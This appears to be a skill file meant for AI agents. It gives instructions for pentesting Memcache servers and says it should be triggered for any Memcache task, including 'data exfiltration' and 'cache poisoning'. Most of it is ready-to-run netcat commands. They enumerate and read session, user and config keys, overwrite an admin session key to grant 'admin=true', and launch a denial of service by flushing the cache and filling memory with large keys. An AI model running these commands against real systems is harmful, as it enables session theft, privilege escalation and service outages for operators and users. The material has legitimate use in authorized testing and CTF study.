Hacktricks-skills memcache-pentest

How to interact with Memcache servers for pentesting and CTF challenges. Use this skill whenever you need to connect to a Memcache service (typically port 11211), read/write cache keys, enumerate stored data, check server statistics, or exploit Memcache vulnerabilities. Trigger this for any Memcache-related task including key enumeration, data exfiltration, cache poisoning, or analyzing Memcache configurations.

install

source · Clone the upstream repo

git clone https://github.com/abelrguezr/hacktricks-skills

manifest: skills/network-services-pentesting/11211-memcache/memcache-commands/SKILL.MD

source content

Memcache Pentesting Skill

This skill helps you interact with Memcache servers during security assessments and CTF challenges. Memcache is a distributed memory caching system that's often misconfigured, leading to information disclosure or cache poisoning vulnerabilities.

Quick Start

Connect to a Memcache server using netcat:

nc <target> 11211

Or use the bundled script for automated operations:

python scripts/memcache_cli.py --host <target> --port 11211 --command <cmd>

Core Commands Reference

Data Operations

Command	Purpose	Example
`get <key>`	Read a value	`get mykey`
`set <key> <flags> <ttl> <size>`	Set a key unconditionally	`set mykey 0 60 4\r\ndata\r\n`
`add <key> <flags> <ttl> <size>`	Add a new key (fails if exists)	`add newkey 0 60 5`
`replace <key> <flags> <ttl> <size>`	Overwrite existing key	`replace key 0 60 5`
`append <key> <flags> <ttl> <size>`	Append data to existing key	`append key 0 60 15`
`prepend <key> <flags> <ttl> <size>`	Prepend data to existing key	`prepend key 0 60 15`
`incr <key> <value>`	Increment numerical value	`incr mykey 2`
`decr <key> <value>`	Decrement numerical value	`decr mykey 5`
`delete <key>`	Delete a key	`delete mykey`

Server Operations

Command	Purpose	Example
`flush_all`	Invalidate all items immediately	`flush_all`
`flush_all <delay>`	Invalidate all items in n seconds	`flush_all 900`
`stats`	Print general statistics	`stats`
`stats slabs`	Print memory statistics	`stats slabs`
`stats items`	Print info on items	`stats items`
`stats reset`	Reset statistics counters	`stats reset`
`version`	Print server version	`version`
`quit`	Terminate session	`quit`

Common Pentesting Tasks

1. Check if Memcache is Accessible

nc -zv <target> 11211

If the port is open, try connecting and sending

version

echo "version" | nc <target> 11211

2. Enumerate Stored Keys

Memcache doesn't have a built-in key listing command, but you can:

Check how many items exist:

echo "stats items" | nc <target> 11211

Look for common key patterns (session IDs, user data, etc.):

echo "get session:" | nc <target> 11211
echo "get user:" | nc <target> 11211
echo "get cache:" | nc <target> 11211

Use the

lru_crawler metadump

command (if available):

echo "lru_crawler metadump all" | nc <target> 11211

3. Read Arbitrary Keys

Try common key patterns:

# Session keys
echo "get session_id" | nc <target> 11211
echo "get session:" | nc <target> 11211

# User data
echo "get user:1" | nc <target> 11211
echo "get user:admin" | nc <target> 11211

# Application cache
echo "get config" | nc <target> 11211
echo "get database" | nc <target> 11211

4. Cache Poisoning

Inject malicious data into the cache:

# Set a key with malicious content
printf "set malicious_key 0 3600 20\r\nmalicious_payload\r\n" | nc <target> 11211

# Overwrite existing keys (if replace is allowed)
printf "replace session:admin 0 3600 15\r\nadmin=true\r\n" | nc <target> 11211

5. Check Server Statistics

Get traffic and memory stats:

# General stats
echo "stats" | nc <target> 11211

# Memory allocation
echo "stats slabs" | nc <target> 11211

# Item information
echo "stats items" | nc <target> 11211

Look for:

```
evictions
```
- if > 0, memory is constrained
```
curr_items
```
- number of cached items
```
cmd_get
```
/
```
cmd_set
```
- traffic patterns

6. Denial of Service

Warning: Only use in authorized testing!

# Flush all cache
echo "flush_all" | nc <target> 11211

# Fill memory with large keys
for i in {1..1000}; do
  printf "set key_$i 0 0 1000000\r\n$(head -c 1000000 /dev/zero)\r\n" | nc <target> 11211
done

Important Notes

Line Breaks

Memcache protocol requires

\r\n

(CRLF) line breaks. When using Unix CLI tools:

# Correct - use printf with \r\n
printf "set mykey 0 60 4\r\ndata\r\n" | nc localhost 11211

# Incorrect - echo uses \n only
echo "set mykey 0 60 4" | nc localhost 11211  # May not work

Command Format

The

set

command format is:

set <key> <flags> <ttl> <bytes>\r\n<data>\r\n

```
flags
```
: Integer for client-side use (usually 0)
```
ttl
```
: Time-to-live in seconds (0 = forever)
```
bytes
```
: Size of data in bytes

Common Vulnerabilities

Unauthenticated Access: Memcache often runs without authentication
Information Disclosure: Cached session data, credentials, or sensitive info
Cache Poisoning: Injecting malicious data that gets served to users
DoS: Memory exhaustion or cache flushing

Using the Bundled Script

The

scripts/memcache_cli.py

script provides a convenient interface:

# Get a key
python scripts/memcache_cli.py --host 10.0.0.1 --port 11211 --command get --key mykey

# Set a key
python scripts/memcache_cli.py --host 10.0.0.1 --port 11211 --command set --key mykey --value "mydata"

# Get stats
python scripts/memcache_cli.py --host 10.0.0.1 --port 11211 --command stats

# Enumerate common keys
python scripts/memcache_cli.py --host 10.0.0.1 --port 11211 --command enumerate